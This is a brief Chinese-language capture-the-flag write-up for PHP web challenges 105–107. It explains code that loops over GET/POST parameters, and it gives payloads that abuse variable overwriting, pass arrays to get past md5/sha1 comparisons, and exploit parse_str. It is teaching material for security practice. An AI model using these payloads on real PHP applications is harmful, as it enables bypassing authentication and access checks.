foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }

这一段说get传的值不能等于error。

foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }

这一段说POST传的值不能等于flag。

1
2
3

if(!($_POST['flag']==$flag)){
    die($error);
}

这一段说POST传的值不等于flag的话输出变量error。
payload:

1 2	GET:?a=flag POST:error=a

web106

这道题就比web105多一个比较。
payload:

1 2	GET:v2[]=1 POST:v1[]=2

web107

parse_str(string,array)
把查询字符串解析到变量中。
string必选。规定要解析的字符串
array可选。规定存储变量的数组的名称。

题目就是把v1的值赋给v2，然后让v2的值和v3的MD5值相同。
payload:

1 2	GET:?v3=a POST:v1=flag=0cc175b9c0f1b6a831c399e269772661

MD5没办法处理数组。

1 2	GET:?v3=a POST:v1= #空

连接不到服务器…..

找不到服务器……